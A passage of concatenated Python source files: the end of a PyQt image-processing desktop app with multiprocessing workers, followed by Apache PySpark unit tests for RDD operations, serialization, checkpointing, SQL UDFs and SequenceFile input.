tasks_queue.put(BLOCKING_TASK)
results_queue.put(task)
return
class ImagesWindow(QtWidgets.QMainWindow, images_shower.Ui_ImagesShower):
def __init__(self, file_path):
super().__init__()
self.setupUi(self)
self.setFixedSize(self.size())
label_original_image = QtWidgets.QLabel(self.originalImageFrame)
original_image_object = QtGui.QImage(file_path)
original_image_object = original_image_object.scaled(SHOWING_IMAGE_WIDTH, SHOWING_IMAGE_HEIGHT,
aspectRatioMode=QtCore.Qt.KeepAspectRatio,
transformMode=QtCore.Qt.SmoothTransformation)
label_original_image.setPixmap(QtGui.QPixmap.fromImage(original_image_object))
_, file_name = os.path.split(file_path)
tmp_path = os.path.join(TMP_DIRECTORY, file_name)
label_result_image = QtWidgets.QLabel(self.resultImageFrame)
result_image_object = QtGui.QImage(tmp_path)
result_image_object = result_image_object.scaled(SHOWING_IMAGE_WIDTH, SHOWING_IMAGE_HEIGHT,
aspectRatioMode=QtCore.Qt.KeepAspectRatio,
transformMode=QtCore.Qt.SmoothTransformation)
label_result_image.setPixmap(QtGui.QPixmap.fromImage(result_image_object))
class MainApp(QtWidgets.QMainWindow, design.Ui_MyWowApp):
def __init__(self):
# Это здесь нужно для доступа к переменным, методам
# и т.д. в файле design.py
super().__init__()
self.setupUi(self) # Это нужно для инициализации нашего дизайна
self.tasks_count = 0
self.addTaskButton.clicked.connect(self.upload_new_images)
self.saveAllResultsButton.clicked.connect(self.save_all_results)
self.tasksListWidget.itemActivated.connect(self.task_selected_event)
self.updating_result_thread = threading.Thread(target=self.update_result_info)
self.updating_result_thread.start()
# Добавим в очередь разблокировки только 4 команды - разблокируем 4 потока
for _ in range(START_PROCESSES_COUNT):
unblocking_queue.put("1")
def upload_new_images(self):
files = QtWidgets.QFileDialog.getOpenFileNames(self,
"Select one or more files",
"/home",
"Images (*.png *.xpm *.jpg)")
if files:
for file in files[0]:
self.tasks_count += 1
task_name = str(self.tasks_count) + ". " + file
self.tasksListWidget.addItem(task_name)
tasks_queue.put(task_name)
# Запустить счётчик % обработки
self.processListWidget.addItem(str(self.tasks_count) + ". " + WAITING_TEXT)
def update_result_info(self):
while True:
task = results_queue.get()
if task == FINISH_TASK:
break
task_id = task.split('.')[0]
self.processListWidget.item(int(task_id) - 1).setText(task_id + ". " + READY_TEXT)
return
def check_if_the_task_is_ready(self, task_id):
"""
task_id - число int, по которому можно получить элемент в processListWidget
Возвращает True, если задача выполнена и False иначе
"""
process_text = self.processListWidget.item(task_id).text().split(' ')[1]
if process_text == READY_TEXT:
return True
return False
def task_selected_event(self, item):
split_item_text = item.text().split(' ')
file_path = split_item_text[1]
task_id = int(split_item_text[0].split('.')[0]) - 1
# Проверяем, что задача выполнена, и только если она выполнена, открываем новое окно с картинкой
if self.check_if_the_task_is_ready(task_id):
self.images_dialog = ImagesWindow(file_path)
self.images_dialog.show()
def save_all_results(self):
if not os.path.isdir(TMP_DIRECTORY):
return
directory_to_save = str(QtWidgets.QFileDialog.getExistingDirectory(self, "Select Directory"))
# Копируем файлы из папки tmp в directory_to_save
for file_name in os.listdir(TMP_DIRECTORY):
tmp_path = os.path.join(TMP_DIRECTORY, file_name)
shutil.copy(tmp_path, directory_to_save)
def closeEvent(self, event):
for _ in range(PROCESSES_COUNT):
tasks_queue.put(FINISH_TASK)
if os.path.exists(TMP_DIRECTORY):
shutil.rmtree(TMP_DIRECTORY)
event.accept()
def run_app():
app = QtWidgets.QApplication(sys.argv) # Новый экземпляр QApplication
window = MainApp() # Создаём объект класса ExampleApp
window.show() # Показываем окно
app.exec_() # и запускаем приложение
import numpy as np
if __name__ == '__main__': # Если мы запускаем файл напрямую, а не импортируем
shared_data_manager = Manager()
namespace = shared_data_manager.Namespace()
namespace.currently_taking_memory = 0
namespace.currently_working_processes = 0
with Pool(PROCESSES_COUNT, worker_fun, (tasks_queue, results_queue, unblocking_queue, namespace, atomic_operation)) as workers_pool:
run_app()
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from fileinput import input
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
from platform import python_implementation
if sys.version_info[:2] <= (2, 6):
import unittest2 as unittest
else:
import unittest
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, ExternalSorter
from pyspark.sql import SQLContext, IntegerType, Row
from pyspark import shuffle
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class TestMerger(unittest.TestCase):
def setUp(self):
self.N = 1 << 16
self.l = [i for i in xrange(self.N)]
self.data = zip(self.l, self.l)
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_in_memory(self):
m = InMemoryMerger(self.agg)
m.mergeValues(self.data)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = InMemoryMerger(self.agg)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (k, v): (k, [str(v)]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m._recursive_merged_items(0)),
self.N * 10)
m._cleanup()
class TestSorter(unittest.TestCase):
def test_in_memory_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = range(10240)
random.shuffle(l)
rdd = sc.parallelize(l, 10)
self.assertEquals(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from cPickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEquals(p1, p2)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEquals(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.func_code.co_names)
ser.dumps(foo)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name, batchSize=2)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class TestCheckpoint(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEquals([1, 2, 3, 4], recovered.collect())
class TestAddFile(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
log4j = self.sc._jvm.org.apache.log4j
old_level = log4j.LogManager.getRootLogger().getLevel()
log4j.LogManager.getRootLogger().setLevel(log4j.Level.FATAL)
def func(x):
from userlibrary import UserClass
return UserClass().hello()
self.assertRaises(Exception,
self.sc.parallelize(range(2)).map(func).first)
log4j.LogManager.getRootLogger().setLevel(old_level)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEquals("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1-py2.7.egg")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class TestRDDFunctions(PySparkTestCase):
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.sc.stop()
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
self.sc = SparkContext("local")
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda (x, y): x + y).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize(["Hello", "World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual("Hello World!", x.strip())
self.assertEqual("Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
def testAggregateByKey(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEquals([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 100000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 270MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEquals(N, m)
def test_large_closure(self):
N = 1000000
data = [float(i) for i in xrange(N)]
m = self.sc.parallelize(range(1), 1).map(lambda x: len(data)).sum()
self.assertEquals(N, m)
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEquals(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(range(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.04) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.5))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals([4], rdd.histogram([0, 10])[1])
self.assertEquals([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEquals([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEquals([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEquals([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEquals(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEquals(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEquals((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEquals([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
# mixed RDD
rdd = self.sc.parallelize([1, 4, "ab", "ac", "b"], 2)
self.assertEquals([1, 1], rdd.histogram([0, 4, 10])[1])
self.assertEquals([2, 1], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals(([1, "b"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEquals(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEquals(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEquals(rdd.getNumPartitions(), 10)
self.assertEquals(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
class TestSQL(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.sqlCtx = SQLContext(self.sc)
def test_udf(self):
self.sqlCtx.registerFunction("twoArgs", lambda x, y: len(x) + y, IntegerType())
[row] = self.sqlCtx.sql("SELECT twoArgs('test', 1)").collect()
self.assertEqual(row[0], 5)
def test_broadcast_in_udf(self):
bar = {"a": "aa", "b": "bb", "c": "abc"}
foo = self.sc.broadcast(bar)
self.sqlCtx.registerFunction("MYUDF", lambda x: foo.value[x] if x else '')
[res] = self.sqlCtx.sql("SELECT MYUDF('c')").collect()
self.assertEqual("abc", res[0])
[res] = self.sqlCtx.sql("SELECT MYUDF('')").collect()
self.assertEqual("", res[0])
def test_basic_functions(self):
rdd = self.sc.parallelize(['{"foo":"bar"}', '{"foo":"baz"}'])
srdd = self.sqlCtx.jsonRDD(rdd)
srdd.count()
srdd.collect()
srdd.schemaString()
srdd.schema()
# cache and checkpoint
self.assertFalse(srdd.is_cached)
srdd.persist()
srdd.unpersist()
srdd.cache()
self.assertTrue(srdd.is_cached)
self.assertFalse(srdd.isCheckpointed())
self.assertEqual(None, srdd.getCheckpointFile())
srdd = srdd.coalesce(2, True)
srdd = srdd.repartition(3)
srdd = srdd.distinct()
srdd.intersection(srdd)
self.assertEqual(2, srdd.count())
srdd.registerTempTable("temp")
srdd = self.sqlCtx.sql("select foo from temp")
srdd.count()
srdd.collect()
def test_distinct(self):
rdd = self.sc.parallelize(['{"a": 1}', '{"b": 2}', '{"c": 3}']*10, 10)
srdd = self.sqlCtx.jsonRDD(rdd)
self.assertEquals(srdd.getNumPartitions(), 10)
self.assertEquals(srdd.distinct().count(), 3)
result = srdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
def test_apply_schema_to_row(self):
srdd = self.sqlCtx.jsonRDD(self.sc.parallelize(["""{"a":2}"""]))
srdd2 = self.sqlCtx.applySchema(srdd.map(lambda x: x), srdd.schema())
self.assertEqual(srdd.collect(), srdd2.collect())
rdd = self.sc.parallelize(range(10)).map(lambda x: Row(a=x))
srdd3 = self.sqlCtx.applySchema(rdd, srdd.schema())
self.assertEqual(10, srdd3.count())
def test_serialize_nested_array_and_map(self):
d = [Row(l=[Row(a=1, b='s')], d={"key": Row(c=1.0, d="2")})]
rdd = self.sc.parallelize(d)
srdd = self.sqlCtx.inferSchema(rdd)
row = srdd.first()
self.assertEqual(1, len(row.l))
self.assertEqual(1, row.l[0].a)
self.assertEqual("2", row.d["key"].d)
l = srdd.map(lambda x: x.l).first()
self.assertEqual(1, len(l))
self.assertEqual('s', l[0].b)
d = srdd.map(lambda x: x.d).first()
self.assertEqual(1, len(d))
self.assertEqual(1.0, d["key"].c)
row = srdd.map(lambda x: x.d["key"]).first()
self.assertEqual(1.0, row.c)
self.assertEqual("2", row.d)
class TestIO(PySparkTestCase):
def test_stdout_redirection(self):
import subprocess
def func(x):
subprocess.check_call('ls', shell=True)
self.sc.parallelize([1]).foreach(func)
class TestInputFormat(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
self.sc._jvm.WriteInputFormatTestDataGenerator.generateData(self.tempdir.name, self.sc._jsc)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.tempdir.name)
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
